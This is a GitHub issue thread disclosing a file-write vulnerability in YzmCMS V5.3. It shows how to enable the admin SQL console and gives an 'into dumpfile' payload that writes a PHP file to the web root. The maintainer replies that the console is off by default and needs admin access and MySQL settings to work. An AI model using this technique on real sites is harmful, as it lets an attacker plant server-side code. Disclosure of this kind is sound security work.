### ISSUE TITLE
YzmCmsV5.3 File write vulnerability exists in the background

### ISSUE THREAD

**Issue by nw01f** [yzmcms/yzmcms#19]
#### 0x01 Modify configuration file

    Modify configuration file [/WWWroot/common/config/config.php] Modify the 'sql_execute' option to 'true'.Allows execution of SQL statements online.

`//其他设置
'sql_execute'        => true        //是否允许在线执行SQL命令`

![1](https://user-images.githubusercontent.com/43234595/61097989-f4738200-a48f-11e9-9626-10383c72096c.png)

#### 0x02 Execute the payload statement

`select '<?php phpinfo() ?>' into dumpfile 'E://phpStudy/WWW/cms/help.ph\p'`

![4](https://user-images.githubusercontent.com/43234595/61098436-9182ea80-a491-11e9-8145-37814eba76a5.png)

#### 0x03 File successfully written

![3](https://user-images.githubusercontent.com/43234595/61098229-d9edd880-a490-11e9-8474-6034161d3dda.png)

**Comment by l0calh0sts** [comment]
There should be applause here.

**Comment by yzmcms** [comment]
这个SQL命令行本来就是为开发调试时的功能，开发完成后都是禁用这个功能的。
若想开启只有手动修改yzmcms的配置文件config.php ，才能开启SQL命令行（只能手动修改配置文件开启！！！）
其次是你要进得去管理员后台才行（除了弱密码，否则你进不去哈），
再其次你要想办法知道站点的安装绝对路径才行（因为写入文件需要绝对路径，感觉你也没有办法获取到哈！），
再最后需要修改MySQL的配置文件(my.ini),查看是否允许导入导出文件：
SQL：show variables like '%secure%'
secure-file-priv 的值默认为null，也就是禁止导入导出文件，所以也是没有办法导出文件的！

前些天提交到CNVD了，被忽略了，没想到你又发到这里了，真是醉了，少侠还是在去找找其他洞吧。。。
